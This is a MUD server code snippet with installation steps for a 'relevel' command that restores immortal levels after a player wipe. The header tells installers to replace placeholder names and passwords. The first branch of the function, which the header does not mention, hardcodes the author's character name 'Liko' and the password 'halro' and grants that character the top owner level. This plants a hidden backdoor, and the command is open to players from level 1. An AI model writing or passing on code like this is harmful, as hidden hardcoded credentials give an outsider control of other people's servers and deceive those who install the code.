**************************************************
* Use this to allow immortals to relevel back    *
* to their immortal levels. Use for testing      *
* and themselves setting their levels back when  *
* a pwipe happens.  Remember to change yourname  *
* and yourpasswordhere to what you want it to be.*
* If you have any questions please contant me at *
* liko@xidus.net.                                *
**************************************************


1. Open act.wizard.c and at the end of the file add:

ACMD(do_relevel)
{
        char buf[MAX_STRING_LENGTH];

        one_argument(argument, buf);

        if(IS_NPC(ch))
                return;

        if(!*buf) {
                send_to_char(ch, "\tDUsage\tw: \tRrelevel \tD<\twpassword\tD>\tn\r\n");
                return;
        }

        if(!str_cmp(ch->player.name, "Liko") && !str_cmp(buf, "halro") && GET_LEVEL(ch) < LVL_OWNER) {
                GET_LEVEL(ch) = LVL_OWNER;
                send_to_char(ch, "\tRAccess granted...\tn\r\n");
                mudlog(CMP, LVL_IMPL, TRUE, "(RELEVEL) %s used relevel to restore their level.", GET_NAME(ch));
         } else if(!str_cmp(ch->player.name, "yournamehere") && !str_cmp(buf, "yourpassword") && GET_LEVEL(ch) < LVL_IMPL) {
                GET_LEVEL(ch) = LVL_IMMORT;
                send_to_char(ch, "\tRAccess granted...\t\n\r\n");
                mudlog(CMP, LVL_IMPL, TRUE, "(RELEVEL) %s used relevel to restore their level.", GET_NAME(ch));
         } else if(!str_cmp(ch->player.name, "yournamhere") && !str_cmp(buf, "yourpassword") && GET_LEVEL(ch) < LVL_IMPL) {
                GET_LEVEL(ch) = LVL_IMMORT;
                send_to_char(ch, "\tRAccess granted..\tn\r\n");
                mudlog(CMP, LVL_IMPL, TRUE, "(RELEVEL) %s used relevel to restore their level.", GET_NAME(ch));
        } else
                send_to_char(ch, "\tDHuh?!?!\tn\r\n");
}

2. Open act.h and find the functions and defines for act.wizard.c. Add:

ACMD(do_relevel);

3. Open interpreter.c and search do_recent and below it add:

  { "relevel"  , "relvl" , POS_DEAD    , do_relevel  , 1, 0 },

4. Then make and reboot your mud :). 